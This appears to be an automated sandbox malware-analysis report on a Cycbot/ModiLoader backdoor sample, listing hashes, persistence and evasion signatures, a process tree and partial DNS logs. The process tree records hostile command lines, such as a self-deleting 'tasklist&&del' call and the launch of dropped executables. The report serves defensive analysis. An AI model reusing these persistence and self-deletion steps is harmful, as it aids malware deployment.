Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

10

JaffaCakes...6d.exe

windows7-x64

10

JaffaCakes...6d.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    87s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19/01/2025, 14:41 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    JaffaCakes118_ca91d7233de94df30ccbb02bcf7eb86d.exe

  • Size

    667KB

  • MD5

    ca91d7233de94df30ccbb02bcf7eb86d

  • SHA1

    7a96c6de2a629170e4bc24a81df72e24a87d77ae

  • SHA256

    1ae7b586ef1b22df289badb804323398d4672dcc9da455d89ffcf22814a31267

  • SHA512

    cd3687d7766f8fe2b80f319944cf8a128f34b243e45b3f0ad1973138445a95a4938df00941f917491dfaf379bdab9a53946426bf5a9e06d7c07a9e655c28a3f5

  • SSDEEP

    12288:WbMqmEEEb4E9F/ATyGv4XKGQi2lJLm1Giizl6oAlpxElrW1A:WIeEEb4Ev/ATEXKGVnGTzpA1Ec1A

Score
10/10
cycbotmodiloaderbackdoordiscoveryevasionpersistencerattrojanupx

Malware Config

Signatures

  • Cycbot

    Cycbot is a backdoor and trojan written in C++..

    backdoorratcycbot
  • Cycbot family
    cycbot
  • Detects Cycbot payload 5 IoCs

    Cycbot is a backdoor and trojan written in C++.

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

    trojanmodiloader
  • Modifies security service 2 TTPs 1 IoCs
    evasion
  • Modifies visiblity of hidden/system files in Explorer 2 TTPs 2 IoCs
    evasion
  • Modiloader family
    modiloader
  • ModiLoader Second Stage 7 IoCs
  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 11 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

    persistence
  • Disables taskbar notifications via registry modification
    evasion
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 8 IoCs
  • Adds Run key to start application 2 TTPs 52 IoCs
    persistence
  • Enumerates connected drives 3 TTPs 22 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
    discovery
  • Suspicious use of SetThreadContext 2 IoCs
  • UPX packed file 17 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in Program Files directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer settings 1 TTPs 16 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 22 IoCs
  • Suspicious use of WriteProcessMemory 55 IoCs
  • System policy modification 1 TTPs 2 IoCs
    evasion
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_ca91d7233de94df30ccbb02bcf7eb86d.exe
    "C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_ca91d7233de94df30ccbb02bcf7eb86d.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1520
    • C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_ca91d7233de94df30ccbb02bcf7eb86d.exe
      JaffaCakes118_ca91d7233de94df30ccbb02bcf7eb86d.exe
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3320
      • C:\Users\Admin\DV245F.exe
        C:\Users\Admin\DV245F.exe
        3⤵
        • Modifies visiblity of hidden/system files in Explorer
        • Checks computer location settings
        • Executes dropped EXE
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2676
        • C:\Users\Admin\qwjuiw.exe
          "C:\Users\Admin\qwjuiw.exe"
          4⤵
          • Modifies visiblity of hidden/system files in Explorer
          • Executes dropped EXE
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:2980
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c tasklist&&del DV245F.exe
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3404
          • C:\Windows\SysWOW64\tasklist.exe
            tasklist
            5⤵
            • Enumerates processes with tasklist
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:3976
      • C:\Users\Admin\aohost.exe
        C:\Users\Admin\aohost.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3136
        • C:\Users\Admin\aohost.exe
          aohost.exe
          4⤵
          • Executes dropped EXE
          • Maps connected drives based on registry
          • Suspicious behavior: EnumeratesProcesses
          PID:3168
      • C:\Users\Admin\bohost.exe
        C:\Users\Admin\bohost.exe
        3⤵
        • Modifies security service
        • Executes dropped EXE
        • Adds Run key to start application
        • Drops file in Program Files directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        • System policy modification
        PID:2272
        • C:\Users\Admin\bohost.exe
          C:\Users\Admin\bohost.exe startC:\Users\Admin\AppData\Roaming\D0769\E71E4.exe%C:\Users\Admin\AppData\Roaming\D0769
          4⤵
          • Executes dropped EXE
          PID:4864
        • C:\Users\Admin\bohost.exe
          C:\Users\Admin\bohost.exe startC:\Program Files (x86)\69E3C\lvvm.exe%C:\Program Files (x86)\69E3C
          4⤵
          • Executes dropped EXE
          PID:4760
      • C:\Users\Admin\dohost.exe
        C:\Users\Admin\dohost.exe
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of SetWindowsHookEx
        PID:2144
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c tasklist&&del JaffaCakes118_ca91d7233de94df30ccbb02bcf7eb86d.exe
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4172
        • C:\Windows\SysWOW64\tasklist.exe
          tasklist
          4⤵
          • Enumerates processes with tasklist
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          PID:4244
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:4884
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    • Boot or Logon Autostart Execution: Active Setup
    • Enumerates connected drives
    • Checks SCSI registry key(s)
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:3560
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:4908
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    • Boot or Logon Autostart Execution: Active Setup
    • Enumerates connected drives
    • Checks SCSI registry key(s)
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:2072
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:3780
  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:412
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    • Boot or Logon Autostart Execution: Active Setup
    • Enumerates connected drives
    • Checks SCSI registry key(s)
    • Modifies registry class
    • Suspicious use of SendNotifyMessage
    PID:4724
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:2948
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    • Boot or Logon Autostart Execution: Active Setup
    • Enumerates connected drives
    • Checks SCSI registry key(s)
    • Modifies registry class
    • Suspicious use of SendNotifyMessage
    PID:4028
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:3644
  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:4108
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    • Boot or Logon Autostart Execution: Active Setup
    • Enumerates connected drives
    • Checks SCSI registry key(s)
    • Modifies registry class
    PID:4832
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:1048
  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:2948
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    • Boot or Logon Autostart Execution: Active Setup
    • Enumerates connected drives
    • Checks SCSI registry key(s)
    • Modifies registry class
    PID:4648
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:2676
  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:1052
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    • Boot or Logon Autostart Execution: Active Setup
    • Enumerates connected drives
    • Checks SCSI registry key(s)
    • Modifies registry class
    PID:2072
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:4744
  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:2368
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    • Boot or Logon Autostart Execution: Active Setup
    • Enumerates connected drives
    • Checks SCSI registry key(s)
    • Modifies registry class
    PID:2016
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:3292
  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:1220
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    • Boot or Logon Autostart Execution: Active Setup
    • Enumerates connected drives
    • Checks SCSI registry key(s)
    • Modifies registry class
    PID:1492
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:1776
  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:1448
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    • Boot or Logon Autostart Execution: Active Setup
    • Enumerates connected drives
    • Checks SCSI registry key(s)
    • Modifies registry class
    PID:1180
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:1176
  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:644
  • C:\Windows\explorer.exe
    explorer.exe
    1⤵
    • Boot or Logon Autostart Execution: Active Setup
    • Enumerates connected drives
    • Checks SCSI registry key(s)
    • Modifies registry class
    PID:4444
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
      PID:3212
    • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
      "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
      1⤵
        PID:968
      • C:\Windows\explorer.exe
        explorer.exe
        1⤵
          PID:2632
        • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
          "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
          1⤵
            PID:3972
          • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
            "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
            1⤵
              PID:4980
            • C:\Windows\explorer.exe
              explorer.exe
              1⤵
                PID:3248
              • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                1⤵
                  PID:1580
                • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                  "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                  1⤵
                    PID:3564
                  • C:\Windows\explorer.exe
                    explorer.exe
                    1⤵
                      PID:548
                    • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                      "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                      1⤵
                        PID:3800
                      • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                        "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                        1⤵
                          PID:3776
                        • C:\Windows\explorer.exe
                          explorer.exe
                          1⤵
                            PID:4212
                          • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                            "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                            1⤵
                              PID:4484
                            • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                              "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                              1⤵
                                PID:1676
                              • C:\Windows\explorer.exe
                                explorer.exe
                                1⤵
                                  PID:2668
                                • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                  "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                  1⤵
                                    PID:1776
                                  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                    1⤵
                                      PID:3084
                                    • C:\Windows\explorer.exe
                                      explorer.exe
                                      1⤵
                                        PID:4972
                                      • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                        "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                        1⤵
                                          PID:4120
                                        • C:\Windows\explorer.exe
                                          explorer.exe
                                          1⤵
                                            PID:3852
                                          • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                            "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                            1⤵
                                              PID:4760
                                            • C:\Windows\explorer.exe
                                              explorer.exe
                                              1⤵
                                                PID:3216
                                              • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                1⤵
                                                  PID:4832
                                                • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                  "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                  1⤵
                                                    PID:4224
                                                  • C:\Windows\explorer.exe
                                                    explorer.exe
                                                    1⤵
                                                      PID:2464
                                                    • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                      "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                      1⤵
                                                        PID:1048
                                                      • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                        "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                        1⤵
                                                          PID:1772
                                                        • C:\Windows\explorer.exe
                                                          explorer.exe
                                                          1⤵
                                                            PID:2676
                                                          • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                            "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                            1⤵
                                                              PID:1008
                                                            • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                              "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                              1⤵
                                                                PID:3564
                                                              • C:\Windows\explorer.exe
                                                                explorer.exe
                                                                1⤵
                                                                  PID:1352
                                                                • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                  "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                  1⤵
                                                                    PID:2200
                                                                  • C:\Windows\explorer.exe
                                                                    explorer.exe
                                                                    1⤵
                                                                      PID:3988
                                                                    • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                      "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                      1⤵
                                                                        PID:2180
                                                                      • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                        "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                        1⤵
                                                                          PID:3892
                                                                        • C:\Windows\explorer.exe
                                                                          explorer.exe
                                                                          1⤵
                                                                            PID:4128
                                                                          • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                            "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                            1⤵
                                                                              PID:4116
                                                                            • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                              "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                              1⤵
                                                                                PID:3820
                                                                              • C:\Windows\explorer.exe
                                                                                explorer.exe
                                                                                1⤵
                                                                                  PID:5068
                                                                                • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                  "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                  1⤵
                                                                                    PID:5028
                                                                                  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                    1⤵
                                                                                      PID:632

                                                                                    Network

                                                                                    • flag-us
                                                                                      DNS
                                                                                      104.219.191.52.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      104.219.191.52.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      71.31.126.40.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      71.31.126.40.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      167.173.78.104.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      167.173.78.104.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                      167.173.78.104.in-addr.arpa
                                                                                      IN PTR
                                                                                      a104-78-173-167deploystaticakamaitechnologiescom
                                                                                    • flag-us
                                                                                      DNS
                                                                                      228.249.119.40.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      228.249.119.40.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      evcs-ocsp.ws.symantec.com
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      evcs-ocsp.ws.symantec.com
                                                                                      IN A
                                                                                      Response
                                                                                      evcs-ocsp.ws.symantec.com
                                                                                      IN CNAME
                                                                                      mpki-ocsp.digicert.com
                                                                                      mpki-ocsp.digicert.com
                                                                                      IN CNAME
